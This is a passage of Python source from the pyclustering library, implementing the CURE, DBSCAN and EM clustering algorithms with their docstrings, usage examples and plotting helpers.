## Point indexes in dataset.
self.indexes = -1
## Mean of points that make up cluster.
self.mean = None
## List of points that represents clusters.
self.rep = [ ]
if point is not None:
self.points = [ point ]
self.indexes = [ index ]
self.mean = point
self.rep = [ point ]
## Pointer to the closest cluster.
self.closest = None
## Distance to the closest cluster.
self.distance = float('inf')  # calculating the distance is a really expensive operation (even the squared distance), so let's store the distance to the closest cluster.
def __repr__(self):
"""!
@brief Displays distance to closest cluster and points that are contained by current cluster.
"""
return "%s, %s" % (self.distance, self.points)
class cure:
"""!
@brief Class represents clustering algorithm CURE with KD-tree optimization.
@details CCORE option can be used to use the pyclustering core - C/C++ shared library for processing that significantly increases performance.
Here is an example how to perform cluster analysis of sample 'Lsun':
@code
from pyclustering.cluster import cluster_visualizer;
from pyclustering.cluster.cure import cure;
from pyclustering.utils import read_sample;
from pyclustering.samples.definitions import FCPS_SAMPLES;
# Input data in following format [ [0.1, 0.5], [0.3, 0.1], ... ].
input_data = read_sample(FCPS_SAMPLES.SAMPLE_LSUN);
# Allocate three clusters.
cure_instance = cure(input_data, 3);
cure_instance.process();
clusters = cure_instance.get_clusters();
# Visualize allocated clusters.
visualizer = cluster_visualizer();
visualizer.append_clusters(clusters, input_data);
visualizer.show();
@endcode
"""
def __init__(self, data, number_cluster, number_represent_points = 5, compression = 0.5, ccore = True):
"""!
@brief Constructor of clustering algorithm CURE.
@param[in] data (array_like): Input data that should be processed.
@param[in] number_cluster (uint): Number of clusters that should be allocated.
@param[in] number_represent_points (uint): Number of representative points for each cluster.
@param[in] compression (double): Coefficient that defines the level of shrinking of representation points toward the mean of the newly created cluster after each merge. Usually it is distributed from 0 to 1.
@param[in] ccore (bool): If True then CCORE (C++ solution) will be used for solving.
"""
self.__pointer_data = self.__prepare_data_points(data)
self.__clusters = None
self.__representors = None
self.__means = None
self.__number_cluster = number_cluster
self.__number_represent_points = number_represent_points
self.__compression = compression
self.__ccore = ccore
if self.__ccore:
self.__ccore = ccore_library.workable()
self.__validate_arguments()
def process(self):
"""!
@brief Performs cluster analysis in line with rules of CURE algorithm.
@return (cure) Returns itself (CURE instance).
@see get_clusters()
"""
if self.__ccore is True:
self.__process_by_ccore()
else:
self.__process_by_python()
return self
def __process_by_ccore(self):
"""!
@brief Performs cluster analysis using CCORE (C/C++ part of pyclustering library).
"""
cure_data_pointer = wrapper.cure_algorithm(self.__pointer_data, self.__number_cluster,
self.__number_represent_points, self.__compression)
self.__clusters = wrapper.cure_get_clusters(cure_data_pointer)
self.__representors = wrapper.cure_get_representors(cure_data_pointer)
self.__means = wrapper.cure_get_means(cure_data_pointer)
wrapper.cure_data_destroy(cure_data_pointer)
def __process_by_python(self):
"""!
@brief Performs cluster analysis using python code.
"""
self.__create_queue() # queue
self.__create_kdtree() # create k-d tree
while len(self.__queue) > self.__number_cluster:
cluster1 = self.__queue[0] # cluster that has nearest neighbor.
cluster2 = cluster1.closest # closest cluster.
self.__queue.remove(cluster1)
self.__queue.remove(cluster2)
self.__delete_represented_points(cluster1)
self.__delete_represented_points(cluster2)
merged_cluster = self.__merge_clusters(cluster1, cluster2)
self.__insert_represented_points(merged_cluster)
# Pointers to clusters that should be relocated are stored here.
cluster_relocation_requests = []
# Check for the last cluster
if len(self.__queue) > 0:
merged_cluster.closest = self.__queue[0] # arbitrary cluster from queue
merged_cluster.distance = self.__cluster_distance(merged_cluster, merged_cluster.closest)
for item in self.__queue:
distance = self.__cluster_distance(merged_cluster, item)
# Check if the distance between the new cluster and the current one is better than the current best.
if distance < merged_cluster.distance:
merged_cluster.closest = item
merged_cluster.distance = distance
# Check if current cluster has removed neighbor.
if (item.closest is cluster1) or (item.closest is cluster2):
# If the previous distance was less than the distance to the new cluster then the nearest cluster should
# be found in the tree.
if item.distance < distance:
(item.closest, item.distance) = self.__closest_cluster(item, distance)
# TODO: investigation is required. There is an assumption that the cluster itself and the merged cluster
# should always be in the list of neighbors within the specified radius. But the merged cluster
# may be missing from the list due to calculation error, therefore it is added manually.
if item.closest is None:
item.closest = merged_cluster
item.distance = distance
else:
item.closest = merged_cluster
item.distance = distance
cluster_relocation_requests.append(item)
# The new cluster and the updated clusters should be relocated in the queue.
self.__insert_cluster(merged_cluster)
for item in cluster_relocation_requests:
self.__relocate_cluster(item)
# Change cluster representation
self.__clusters = [cure_cluster_unit.indexes for cure_cluster_unit in self.__queue]
self.__representors = [cure_cluster_unit.rep for cure_cluster_unit in self.__queue]
self.__means = [cure_cluster_unit.mean for cure_cluster_unit in self.__queue]
def get_clusters(self):
"""!
@brief Returns list of allocated clusters, each cluster contains indexes of objects in list of data.
@return (list) List of allocated clusters.
@see process()
@see get_representors()
@see get_means()
"""
return self.__clusters
def get_representors(self):
"""!
@brief Returns list of point-representors of each cluster.
@details Cluster index should be used for navigation between lists of point-representors.
@return (list) List of point-representors of each cluster.
@see get_clusters()
@see get_means()
"""
return self.__representors
def get_means(self):
"""!
@brief Returns list of mean values of each cluster.
@details Cluster index should be used for navigation between mean values.
@return (list) List of mean values of each cluster.
@see get_clusters()
@see get_representors()
"""
return self.__means
def get_cluster_encoding(self):
"""!
@brief Returns clustering result representation type that indicates how clusters are encoded.
@return (type_encoding) Clustering result representation.
@see get_clusters()
"""
return type_encoding.CLUSTER_INDEX_LIST_SEPARATION
def __prepare_data_points(self, sample):
"""!
@brief Prepare data points for clustering.
@details In case of numpy.array a lot of basic operators are overloaded (such as __contains__ and __eq__), so the sample is converted to a plain list.
@return (list) Returns sample in list format.
"""
if isinstance(sample, numpy.ndarray):
return sample.tolist()
return sample
def __validate_arguments(self):
"""!
@brief Check input arguments of the CURE algorithm and if one of them is not correct then an appropriate exception
is thrown.
"""
if len(self.__pointer_data) == 0:
raise ValueError("Empty input data. Data should contain at least one point.")
if self.__number_cluster <= 0:
raise ValueError("Incorrect amount of clusters '%d'. Amount of cluster should be greater than 0." % self.__number_cluster)
if self.__compression < 0:
raise ValueError("Incorrect compression level '%f'. Compression should not be negative." % self.__compression)
if self.__number_represent_points <= 0:
raise ValueError("Incorrect amount of representatives '%d'. Amount of representatives should be greater than 0." % self.__number_cluster)
def __insert_cluster(self, cluster):
"""!
@brief Insert cluster to the list (sorted queue) in line with sequence order (distance).
@param[in] cluster (cure_cluster): Cluster that should be inserted.
"""
for index in range(len(self.__queue)):
if cluster.distance < self.__queue[index].distance:
self.__queue.insert(index, cluster)
return
self.__queue.append(cluster)
def __relocate_cluster(self, cluster):
"""!
@brief Relocate cluster in list in line with distance order.
@param[in] cluster (cure_cluster): Cluster that should be relocated in line with order.
"""
self.__queue.remove(cluster)
self.__insert_cluster(cluster)
def __closest_cluster(self, cluster, distance):
"""!
@brief Find closest cluster to the specified cluster in line with distance.
@param[in] cluster (cure_cluster): Cluster for which nearest cluster should be found.
@param[in] distance (double): Closest distance to the previous cluster.
@return (tuple) Pair (nearest CURE cluster, nearest distance) if the nearest cluster has been found, otherwise (None, float('inf')) is returned.
"""
nearest_cluster = None
nearest_distance = float('inf')
real_euclidean_distance = distance ** 0.5  # cluster distances are squared, while the k-d tree stores real distances
for point in cluster.rep:
# Nearest nodes should be returned (at least it will return itself).
nearest_nodes = self.__tree.find_nearest_dist_nodes(point, real_euclidean_distance)
for (candidate_distance, kdtree_node) in nearest_nodes:
if (candidate_distance < nearest_distance) and (kdtree_node is not None) and (kdtree_node.payload is not cluster):
nearest_distance = candidate_distance
nearest_cluster = kdtree_node.payload
return (nearest_cluster, nearest_distance)
def __insert_represented_points(self, cluster):
"""!
@brief Insert representation points to the k-d tree.
@param[in] cluster (cure_cluster): Cluster whose representation points should be inserted.
"""
for point in cluster.rep:
self.__tree.insert(point, cluster)
def __delete_represented_points(self, cluster):
"""!
@brief Remove representation points of the cluster from the k-d tree.
@param[in] cluster (cure_cluster): Cluster whose representation points should be removed.
"""
for point in cluster.rep:
self.__tree.remove(point, payload=cluster)
def __merge_clusters(self, cluster1, cluster2):
"""!
@brief Merges two clusters and returns new merged cluster. Representation points and mean points are calculated for the new cluster.
@param[in] cluster1 (cure_cluster): Cluster that should be merged.
@param[in] cluster2 (cure_cluster): Cluster that should be merged.
@return (cure_cluster) New merged CURE cluster.
"""
merged_cluster = cure_cluster(None, None)
merged_cluster.points = cluster1.points + cluster2.points
merged_cluster.indexes = cluster1.indexes + cluster2.indexes
# merged_cluster.mean = ( len(cluster1.points) * cluster1.mean + len(cluster2.points) * cluster2.mean ) / ( len(cluster1.points) + len(cluster2.points) );
dimension = len(cluster1.mean)
merged_cluster.mean = [0] * dimension
if merged_cluster.points[1:] == merged_cluster.points[:-1]:  # all points in the merged cluster are identical
merged_cluster.mean = merged_cluster.points[0]
else:
for index in range(dimension):
merged_cluster.mean[index] = (len(cluster1.points) * cluster1.mean[index] + len(cluster2.points) * cluster2.mean[index]) / (len(cluster1.points) + len(cluster2.points))
temporary = list()
for index in range(self.__number_represent_points):
maximal_distance = 0
maximal_point = None
for point in merged_cluster.points:
minimal_distance = 0
if index == 0:
minimal_distance = euclidean_distance_square(point, merged_cluster.mean)
#minimal_distance = euclidean_distance_sqrt(point, merged_cluster.mean);
else:
minimal_distance = min([euclidean_distance_square(point, p) for p in temporary])
#minimal_distance = cluster_distance(cure_cluster(point), cure_cluster(temporary[0]));
if minimal_distance >= maximal_distance:
maximal_distance = minimal_distance
maximal_point = point
if maximal_point not in temporary:
temporary.append(maximal_point)
for point in temporary:
representative_point = [0] * dimension
for index in range(dimension):
representative_point[index] = point[index] + self.__compression * (merged_cluster.mean[index] - point[index])
merged_cluster.rep.append(representative_point)
return merged_cluster
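# Note on the compression step above (illustrative values, not library output):
# each representative is pulled toward the merged mean by the compression
# factor, e.g. with compression=0.5, point=[2.0, 0.0] and mean=[0.0, 0.0] the
# stored representative is [1.0, 0.0].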
def __create_queue(self):
"""!
@brief Creates queue of clusters sorted by the distance to the nearest neighbor, where the first cluster has the nearest neighbor. At the first iteration each cluster contains only one point.
@details The resulting sorted queue is stored in 'self.__queue'.
"""
self.__queue = [cure_cluster(self.__pointer_data[index_point], index_point) for index_point in range(len(self.__pointer_data))]
# set closest clusters
for i in range(0, len(self.__queue)):
minimal_distance = float('inf')
closest_index_cluster = -1
for k in range(0, len(self.__queue)):
if i != k:
dist = self.__cluster_distance(self.__queue[i], self.__queue[k])
if dist < minimal_distance:
minimal_distance = dist
closest_index_cluster = k
self.__queue[i].closest = self.__queue[closest_index_cluster]
self.__queue[i].distance = minimal_distance
# sort clusters
self.__queue.sort(key=lambda x: x.distance, reverse = False)
def __create_kdtree(self):
"""!
@brief Creates k-d tree in line with created clusters. At the first iteration it contains all points from the input data set.
@details The tree consists of representative points of the CURE clusters and is stored in 'self.__tree'.
"""
representatives, payloads = [], []
for current_cluster in self.__queue:
for representative_point in current_cluster.rep:
representatives.append(representative_point)
payloads.append(current_cluster)
# Initialize the tree via the constructor to get a balanced tree from the start; this ensures the best
# performance when the tree holds the largest number of nodes.
self.__tree = kdtree(representatives, payloads)
def __cluster_distance(self, cluster1, cluster2):
"""!
@brief Calculate minimal distance between clusters using representative points.
@param[in] cluster1 (cure_cluster): The first cluster.
@param[in] cluster2 (cure_cluster): The second cluster.
@return (double) Squared Euclidean distance between the two clusters, defined by the minimum distance between their representation points.
"""
distance = float('inf')
for i in range(0, len(cluster1.rep)):
for k in range(0, len(cluster2.rep)):
dist = euclidean_distance_square(cluster1.rep[i], cluster2.rep[k]) # Fast mode
if dist < distance:
distance = dist
return distance
```
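The representative-point construction inside `__merge_clusters` is the heart of CURE: pick the point farthest from the mean, then repeatedly pick the point farthest from the points already chosen, and finally shrink every pick toward the mean. Here is a minimal self-contained sketch of that heuristic (toy data and hypothetical helper names, not the library's API):
```python
# Minimal sketch of CURE's representative-point selection; names are illustrative.
def squared_distance(a, b):
    return sum((x - y) ** 2 for x, y in zip(a, b))

def select_representatives(points, mean, amount, compression):
    chosen = []
    for index in range(min(amount, len(points))):
        # First pick: farthest from the mean; later picks: farthest from the
        # already chosen points (farthest-point heuristic).
        def score(point, first=(index == 0)):
            if first:
                return squared_distance(point, mean)
            return min(squared_distance(point, p) for p in chosen)
        candidate = max(points, key=score)
        if candidate not in chosen:
            chosen.append(candidate)
    # Shrink every representative toward the mean by the compression factor.
    return [[c + compression * (m - c) for c, m in zip(point, mean)]
            for point in chosen]

cluster = [[0.0, 0.0], [4.0, 0.0], [0.0, 4.0], [1.0, 1.0]]
mean = [1.25, 1.25]
print(select_representatives(cluster, mean, amount=2, compression=0.5))
# [[2.625, 0.625], [0.625, 2.625]]
```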
#### File: pyclustering/cluster/dbscan.py
```python
from pyclustering.container.kdtree import kdtree_balanced
from pyclustering.cluster.encoder import type_encoding
from pyclustering.core.wrapper import ccore_library
import pyclustering.core.dbscan_wrapper as wrapper
class dbscan:
"""!
@brief Class represents clustering algorithm DBSCAN.
@details This DBSCAN algorithm is KD-tree optimized.
By default C/C++ pyclustering library is used for processing that significantly increases performance.
Clustering example where DBSCAN algorithm is used to process `Chainlink` data from `FCPS` collection:
@code
from pyclustering.cluster.dbscan import dbscan
from pyclustering.cluster import cluster_visualizer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
# Sample for cluster analysis.
sample = read_sample(FCPS_SAMPLES.SAMPLE_CHAINLINK)
# Create DBSCAN algorithm.
dbscan_instance = dbscan(sample, 0.7, 3)
# Start processing by DBSCAN.
dbscan_instance.process()
# Obtain results of clustering.
clusters = dbscan_instance.get_clusters()
noise = dbscan_instance.get_noise()
# Visualize clustering results
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.append_cluster(noise, sample, marker='x')
visualizer.show()
@endcode
"""
def __init__(self, data, eps, neighbors, ccore=True, **kwargs):
"""!
@brief Constructor of clustering algorithm DBSCAN.
@param[in] data (list): Input data that is presented as list of points or distance matrix (defined by parameter
'data_type', by default data is considered as a list of points).
@param[in] eps (double): Connectivity radius between points; points may be connected if the distance between them is less than the radius.
@param[in] neighbors (uint): Minimum number of shared neighbors that is required to establish a link between points.
@param[in] ccore (bool): If True then the CCORE DLL (C++ solution) will be used for solving the problem.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'data_type').
<b>Keyword Args:</b><br>
- data_type (string): Data type of input sample 'data' that is processed by the algorithm ('points', 'distance_matrix').
"""
self.__pointer_data = data
self.__kdtree = None
self.__eps = eps
self.__sqrt_eps = eps * eps
self.__neighbors = neighbors
self.__visited = None
self.__belong = None
self.__data_type = kwargs.get('data_type', 'points')
self.__clusters = []
self.__noise = []
self.__neighbor_searcher = None
self.__initialize_ccore_state(ccore)
self.__verify_arguments()
def __getstate__(self):
"""!
@brief Returns current state of the algorithm.
@details It does not return internal temporary variables that are not visible to a user.
@return (tuple) Current state of the algorithm.
"""
return (self.__pointer_data, self.__eps, self.__sqrt_eps, self.__neighbors, self.__visited, self.__belong,
self.__data_type, self.__clusters, self.__noise, self.__ccore)
def __setstate__(self, state):
"""!
@brief Set current state of the algorithm.
@details Set state method checks if C++ pyclustering is available for the current platform, as a result `ccore`
state might be different if state is moved between platforms.
"""
self.__pointer_data, self.__eps, self.__sqrt_eps, self.__neighbors, self.__visited, self.__belong, \
self.__data_type, self.__clusters, self.__noise, self.__ccore = state
self.__initialize_ccore_state(True)
def process(self):
"""!
@brief Performs cluster analysis in line with rules of DBSCAN algorithm.
@return (dbscan) Returns itself (DBSCAN instance).
@see get_clusters()
@see get_noise()
"""
if self.__ccore is True:
(self.__clusters, self.__noise) = wrapper.dbscan(self.__pointer_data, self.__eps, self.__neighbors, self.__data_type)
else:
if self.__data_type == 'points':
self.__kdtree = kdtree_balanced(self.__pointer_data, range(len(self.__pointer_data)))
self.__visited = [False] * len(self.__pointer_data)
self.__belong = [False] * len(self.__pointer_data)
self.__neighbor_searcher = self.__create_neighbor_searcher(self.__data_type)
for i in range(0, len(self.__pointer_data)):
if self.__visited[i] is False:
cluster = self.__expand_cluster(i)
if cluster is not None:
self.__clusters.append(cluster)
for i in range(0, len(self.__pointer_data)):
if self.__belong[i] is False:
self.__noise.append(i)
return self
def get_clusters(self):
"""!
@brief Returns allocated clusters.
@remark Allocated clusters can be returned only after data processing (use method process()). Otherwise empty list is returned.
@return (list) List of allocated clusters, each cluster contains indexes of objects in list of data.
@see process()
@see get_noise()
"""
return self.__clusters
def get_noise(self):
"""!
@brief Returns allocated noise.
@remark Allocated noise can be returned only after data processing (use method process() before). Otherwise empty list is returned.
@return (list) List of indexes that are marked as a noise.
@see process()
@see get_clusters()
"""
return self.__noise
def get_cluster_encoding(self):
"""!
@brief Returns clustering result representation type that indicates how clusters are encoded.
@return (type_encoding) Clustering result representation.
@see get_clusters()
"""
return type_encoding.CLUSTER_INDEX_LIST_SEPARATION
def __verify_arguments(self):
"""!
@brief Verify input parameters for the algorithm and throw exception in case of incorrectness.
"""
if len(self.__pointer_data) == 0:
raise ValueError("Input data is empty (size: '%d')." % len(self.__pointer_data))
if self.__eps < 0:
raise ValueError("Connectivity radius (current value: '%d') should be greater or equal to 0." % self.__eps)
def __create_neighbor_searcher(self, data_type):
"""!
@brief Returns neighbor searcher in line with data type.
@param[in] data_type (string): Data type (points or distance matrix).
"""
if data_type == 'points':
return self.__neighbor_indexes_points
elif data_type == 'distance_matrix':
return self.__neighbor_indexes_distance_matrix
else:
raise TypeError("Unknown type of data is specified '%s'" % data_type)
def __expand_cluster(self, index_point):
"""!
@brief Expands cluster from specified point in the input data space.
@param[in] index_point (uint): Index of a point from the data.
@return (list) List of indexes that belong to the allocated cluster, or None if no cluster has been expanded from the specified point.
"""
cluster = None
self.__visited[index_point] = True
neighbors = self.__neighbor_searcher(index_point)
if len(neighbors) >= self.__neighbors:
cluster = [index_point]
self.__belong[index_point] = True
for i in neighbors:
if self.__visited[i] is False:
self.__visited[i] = True
next_neighbors = self.__neighbor_searcher(i)
if len(next_neighbors) >= self.__neighbors:
neighbors += [k for k in next_neighbors if k not in neighbors and k != index_point]
if self.__belong[i] is False:
cluster.append(i)
self.__belong[i] = True
return cluster
def __neighbor_indexes_points(self, index_point):
"""!
@brief Return neighbors of the specified object in case of sequence of points.
@param[in] index_point (uint): Index of the point whose neighbors should be found.
@return (list) List of indexes of neighbors in line with the connectivity radius.
"""
kdnodes = self.__kdtree.find_nearest_dist_nodes(self.__pointer_data[index_point], self.__eps)
return [node_tuple[1].payload for node_tuple in kdnodes if node_tuple[1].payload != index_point]
def __neighbor_indexes_distance_matrix(self, index_point):
"""!
@brief Return neighbors of the specified object in case of distance matrix.
@param[in] index_point (uint): Index of the point whose neighbors should be found.
@return (list) List of indexes of neighbors in line with the connectivity radius.
"""
distances = self.__pointer_data[index_point]
return [index_neighbor for index_neighbor in range(len(distances))
if ((distances[index_neighbor] <= self.__eps) and (index_neighbor != index_point))]
def __initialize_ccore_state(self, ccore):
"""!
@brief Initializes C++ pyclustering state.
@details Checks if C++ pyclustering is requested and if it is available for the current platform. This information is used to
set the status of the C++ pyclustering library.
@param[in] ccore (bool): If True then the C++ implementation is requested.
"""
self.__ccore = ccore
if self.__ccore:
self.__ccore = ccore_library.workable()
```
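One detail of the constructor above that has no example in the docstring is the `data_type` keyword: the same class accepts a precomputed distance matrix, in which case the k-d tree is skipped entirely. A short sketch using the class above (toy matrix chosen so the outcome is easy to verify by hand):
```python
# Running the dbscan class above on a precomputed distance matrix (toy data).
matrix = [[0.0, 1.0, 4.0],
          [1.0, 0.0, 5.0],
          [4.0, 5.0, 0.0]]
instance = dbscan(matrix, eps=1.5, neighbors=1, ccore=False, data_type='distance_matrix')
instance.process()
print(instance.get_clusters())  # [[0, 1]] - points 0 and 1 are within eps of each other
print(instance.get_noise())     # [2] - point 2 has no neighbor within eps
```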
#### File: pyclustering/cluster/ema.py
```python
import numpy
import random
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.center_initializer import kmeans_plusplus_initializer
from pyclustering.cluster.kmeans import kmeans
from pyclustering.utils import pi, calculate_ellipse_description, euclidean_distance_square
from enum import IntEnum
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import patches
def gaussian(data, mean, covariance):
"""!
@brief Calculates gaussian for a dataset using specified mean (mathematical expectation) and variance or covariance in case
of multi-dimensional data.
@param[in] data (list): Data that is used for gaussian calculation.
@param[in] mean (float|numpy.array): Mathematical expectation used for calculation.
@param[in] covariance (float|numpy.array): Variance or covariance matrix for calculation.
@return (list) Value of gaussian function for each point in dataset.
"""
dimension = float(len(data[0]))
if dimension != 1.0:
inv_variance = numpy.linalg.pinv(covariance)
else:
inv_variance = 1.0 / covariance
divider = (pi * 2.0) ** (dimension / 2.0) * numpy.sqrt(numpy.linalg.norm(covariance))
if divider != 0.0:
right_const = 1.0 / divider
else:
right_const = float('inf')
result = []
for point in data:
mean_delta = point - mean
point_gaussian = right_const * numpy.exp( -0.5 * mean_delta.dot(inv_variance).dot(numpy.transpose(mean_delta)) )
result.append(point_gaussian)
return result
class ema_init_type(IntEnum):
"""!
@brief Enumeration of initialization types for Expectation-Maximization algorithm.
"""
## Means are randomly taken from input dataset and variance or covariance is calculated based on
## spherical data that belongs to the chosen means.
RANDOM_INITIALIZATION = 0
## Two step initialization. The first is calculation of initial centers using K-Means++ method.
## The second is K-Means clustering using obtained centers in the first step. Obtained clusters
## and its centers are used for calculation of variance (covariance in case of multi-dimensional)
## data.
KMEANS_INITIALIZATION = 1
class ema_initializer():
"""!
@brief Provides services for preparing initial means and covariances for Expectation-Maximization algorithm.
@details Initialization strategy is defined by the enumerator 'ema_init_type': random initialization and
kmeans with kmeans++ initialization. Here is an example of initialization using the kmeans strategy:
@code
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FAMOUS_SAMPLES
from pyclustering.cluster.ema import ema_initializer
sample = read_sample(FAMOUS_SAMPLES.SAMPLE_OLD_FAITHFUL)
amount_clusters = 2
initial_means, initial_covariance = ema_initializer(sample, amount_clusters).initialize()
print(initial_means)
print(initial_covariance)
@endcode
"""
__MAX_GENERATION_ATTEMPTS = 10
def __init__(self, sample, amount):
"""!
@brief Constructs EM initializer.
@param[in] sample (list): Data that will be used by the EM algorithm.
@param[in] amount (uint): Amount of clusters that should be allocated by the EM algorithm.
"""
self.__sample = sample
self.__amount = amount
def initialize(self, init_type = ema_init_type.KMEANS_INITIALIZATION):
"""!
@brief Calculates initial parameters for EM algorithm: means and covariances using
specified strategy.
@param[in] init_type (ema_init_type): Strategy for initialization.
@return (float|list, float|numpy.array) Initial means and variance (covariance matrix in case of multi-dimensional data).
"""
if init_type == ema_init_type.KMEANS_INITIALIZATION:
return self.__initialize_kmeans()
elif init_type == ema_init_type.RANDOM_INITIALIZATION:
return self.__initialize_random()
raise NameError("Unknown type of EM algorithm initialization is specified.")
def __calculate_initial_clusters(self, centers):
"""!
@brief Calculates Euclidean distance from each center to each point; the nearest points are captured
by the corresponding clusters and as a result the clusters are updated.
@return (list) Updated clusters as list of clusters. Each cluster contains indexes of objects from the data.
"""
clusters = [[] for _ in range(len(centers))]
for index_point in range(len(self.__sample)):
index_optim, dist_optim = -1, 0.0
for index in range(len(centers)):
dist = euclidean_distance_square(self.__sample[index_point], centers[index])
if (dist < dist_optim) or (index == 0):
index_optim, dist_optim = index, dist
clusters[index_optim].append(index_point)
return clusters
def __calculate_initial_covariances(self, initial_clusters):
covariances = []
for initial_cluster in initial_clusters:
if len(initial_cluster) > 1:
cluster_sample = [self.__sample[index_point] for index_point in initial_cluster]
covariances.append(numpy.cov(cluster_sample, rowvar=False))
else:
dimension = len(self.__sample[0])
covariances.append(numpy.zeros((dimension, dimension)) + random.random() / 10.0)
return covariances
def __initialize_random(self):
initial_means = []
for _ in range(self.__amount):
mean = self.__sample[random.randint(0, len(self.__sample) - 1)]
attempts = 0
while (mean in initial_means) and (attempts < ema_initializer.__MAX_GENERATION_ATTEMPTS):
mean = self.__sample[random.randint(0, len(self.__sample) - 1)]
attempts += 1
if attempts == ema_initializer.__MAX_GENERATION_ATTEMPTS:
mean = [ value + (random.random() - 0.5) * value * 0.2 for value in mean ]
initial_means.append(mean)
initial_clusters = self.__calculate_initial_clusters(initial_means)
initial_covariance = self.__calculate_initial_covariances(initial_clusters)
return initial_means, initial_covariance
def __initialize_kmeans(self):
initial_centers = kmeans_plusplus_initializer(self.__sample, self.__amount).initialize()
kmeans_instance = kmeans(self.__sample, initial_centers, ccore = True)
kmeans_instance.process()
means = kmeans_instance.get_centers()
covariances = []
initial_clusters = kmeans_instance.get_clusters()
for initial_cluster in initial_clusters:
if len(initial_cluster) > 1:
cluster_sample = [ self.__sample[index_point] for index_point in initial_cluster ]
covariances.append(numpy.cov(cluster_sample, rowvar=False))
else:
dimension = len(self.__sample[0])
covariances.append(numpy.zeros((dimension, dimension)) + random.random() / 10.0)
return means, covariances
class ema_observer:
"""!
@brief Observer of EM algorithm for collecting algorithm state on each step.
@details It can be used to obtain the whole picture of the clustering process of the EM algorithm. Allocated clusters,
means and covariances are stored in the observer on each step. Here is an example of usage:
@code
from pyclustering.cluster.ema import ema, ema_observer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES
# Read data from text file.
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
# Create EM observer.
observer = ema_observer()
# Create EM algorithm to allocate four clusters and pass observer to it.
ema_instance = ema(sample, 4, observer=observer)
# Run clustering process.
ema_instance.process()
# Print amount of steps that were done by the algorithm.
print("EMA steps:", observer.get_iterations())
# Print evolution of means and covariances.
print("Means evolution:", observer.get_evolution_means())
print("Covariances evolution:", observer.get_evolution_covariances())
# Print evolution of clusters.
print("Clusters evolution:", observer.get_evolution_clusters())
# Print final clusters.
print("Allocated clusters:", observer.get_evolution_clusters()[-1])
@endcode
"""
def __init__(self):
"""!
@brief Initializes EM observer.
"""
self.__means_evolution = []
self.__covariances_evolution = []
self.__clusters_evolution = []
def __len__(self):
"""!
@return (uint) Amount of iterations that were done by the EM algorithm.
"""
return len(self.__means_evolution)
def get_iterations(self):
"""!
@return (uint) Amount of iterations that were done by the EM algorithm.
"""
return len(self.__means_evolution)
def get_evolution_means(self):
"""!
@return (list) Mean of each cluster on each step of clustering.
"""
return self.__means_evolution
def get_evolution_covariances(self):
"""!
@return (list) Covariance matrix (or variance in case of one-dimensional data) of each cluster on each step of clustering.
"""
return self.__covariances_evolution
def get_evolution_clusters(self):
"""!
@return (list) Allocated clusters on each step of clustering.
"""
return self.__clusters_evolution
def notify(self, means, covariances, clusters):
"""!
@brief This method is used by the algorithm to notify the observer about changes by providing the new values:
means, covariances and allocated clusters.
@param[in] means (list): Mean of each cluster on the current step.
@param[in] covariances (list): Covariances of each cluster on the current step.
@param[in] clusters (list): Allocated clusters on the current step.
"""
self.__means_evolution.append(means)
self.__covariances_evolution.append(covariances)
self.__clusters_evolution.append(clusters)
class ema_visualizer:
"""!
@brief Visualizer of EM algorithm's results.
@details Provides services for visualization of particular features of the algorithm, for example,
in case of two-dimensional dataset it shows covariance ellipses.
"""
@staticmethod
def show_clusters(clusters, sample, covariances, means, figure=None, display=True):
"""!
@brief Draws clusters and in case of two-dimensional dataset draws their ellipses.
@details Allocated figure by this method should be closed using `close()` method of this visualizer.
@param[in] clusters (list): Clusters that were allocated by the algorithm.
@param[in] sample (list): Dataset that was used for clustering.
@param[in] covariances (list): Covariances of the clusters.
@param[in] means (list): Means of the clusters.
@param[in] figure (figure): If 'None' then a new figure is created, otherwise the specified figure is used
for visualization.
@param[in] display (bool): If 'True' then figure will be shown by the method, otherwise it should be
shown manually using matplotlib function 'plt.show()'.
@return (figure) Figure where clusters were drawn.
"""
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
if figure is None:
figure = visualizer.show(display=False)
else:
visualizer.show(figure=figure, display=False)
if len(sample[0]) == 2:
ema_visualizer.__draw_ellipses(figure, visualizer, clusters, covariances, means)
if display is True:
plt.show()
return figure
@staticmethod
def close(figure):
"""!
@brief Closes figure object that was used or allocated by the visualizer.
@param[in] figure (figure): Figure object that was used or allocated by the visualizer.
"""
plt.close(figure)
@staticmethod
def animate_cluster_allocation(data, observer, animation_velocity = 75, movie_fps = 1, save_movie = None):
"""!
@brief Animates clustering process that is performed by EM algorithm.
@param[in] data (list): Dataset that is used for clustering.
@param[in] observer (ema_observer): EM observer that was used for collection information about clustering process.
@param[in] animation_velocity (uint): Interval between frames in milliseconds (for run-time animation only).
@param[in] movie_fps (uint): Defines frames per second (for rendering movie only).
@param[in] save_movie (string): If it is specified then animation will be stored to file that is specified in this parameter.
"""
figure = plt.figure()
def init_frame():
return frame_generation(0)
def frame_generation(index_iteration):
figure.clf()
figure.suptitle("EM algorithm (iteration: " + str(index_iteration) +")", fontsize = 18, fontweight = 'bold')
clusters = observer.get_evolution_clusters()[index_iteration]
covariances = observer.get_evolution_covariances()[index_iteration]
means = observer.get_evolution_means()[index_iteration]
ema_visualizer.show_clusters(clusters, data, covariances, means, figure, False)
figure.subplots_adjust(top=0.85)
return [figure.gca()]
iterations = len(observer)
cluster_animation = animation.FuncAnimation(figure, frame_generation, iterations, interval = animation_velocity, init_func = init_frame, repeat_delay = 5000)
if save_movie is not None:
cluster_animation.save(save_movie, writer='ffmpeg', fps=movie_fps, bitrate=1500)
else:
plt.show()
plt.close(figure)
@staticmethod
def __draw_ellipses(figure, visualizer, clusters, covariances, means):
ax = figure.get_axes()[0]
for index in range(len(clusters)):
angle, width, height = calculate_ellipse_description(covariances[index])
color = visualizer.get_cluster_color(index, 0)
ema_visualizer.__draw_ellipse(ax, means[index][0], means[index][1], angle, width, height, color)
@staticmethod
def __draw_ellipse(ax, x, y, angle, width, height, color):
if (width > 0.0) and (height > 0.0):
ax.plot(x, y, color=color, marker='x', markersize=6)
